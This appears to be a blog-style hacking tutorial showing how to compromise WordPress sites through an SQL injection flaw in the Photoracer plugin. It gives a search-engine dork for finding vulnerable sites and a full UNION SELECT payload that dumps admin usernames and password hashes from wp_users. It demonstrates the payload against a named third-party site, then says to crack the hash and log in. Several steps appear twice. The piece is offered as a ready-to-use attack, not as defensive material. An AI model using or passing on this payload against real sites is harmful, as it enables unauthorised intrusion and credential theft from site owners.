Hi here i tell you how to hack wordpress site with easy way i will use exploit to hack sites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?
![http://timani.net/wp-content/uploads/2010/04/wordpress-logo-300x282.png](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRZizKVMe7Um4Qe42cPEp2WT1J-LLWt_oUN-AHqnWtAoaOjvEDTRiSmFuqo78HHXswjptB6XdN4qypuj1QxO8Pdl0l43u_AvkRmKWzdHY2m4DLFnaX-J-M4UNwDKNybe56ochb185XPtVg=s0-d)
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
![[Image: asdmr.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s0CrXe7QuSXGIlvMpsJz08zZIxtZwTfkcI81oRHW-vLx-AiAlyPidaQe50fAHy4V4A-7zT7YETSNdMxF0CZDjokTkmJJRwqbyBR4EZXCgKhlAxi_Q=s0-d)
and i'm gonna test 1 of them for ex this find in google
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
![http://img638.imageshack.us/img638/2927/asddy.png](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tKMtRGP5RI8TJ4qsw1iCYVObtkzTFjilIfEECUXLzPCPFrotin887EIi7tT3Tk3FPMwQ2kUrKngyXMfsP1HNMj33TOo5zlTYE58zpa1jkpUiKVHw=s0-d)
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
and i'm gonna test 1 of them for ex this find in google
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php
How to hack Wordpress website with Phototrace SQLi vulnerability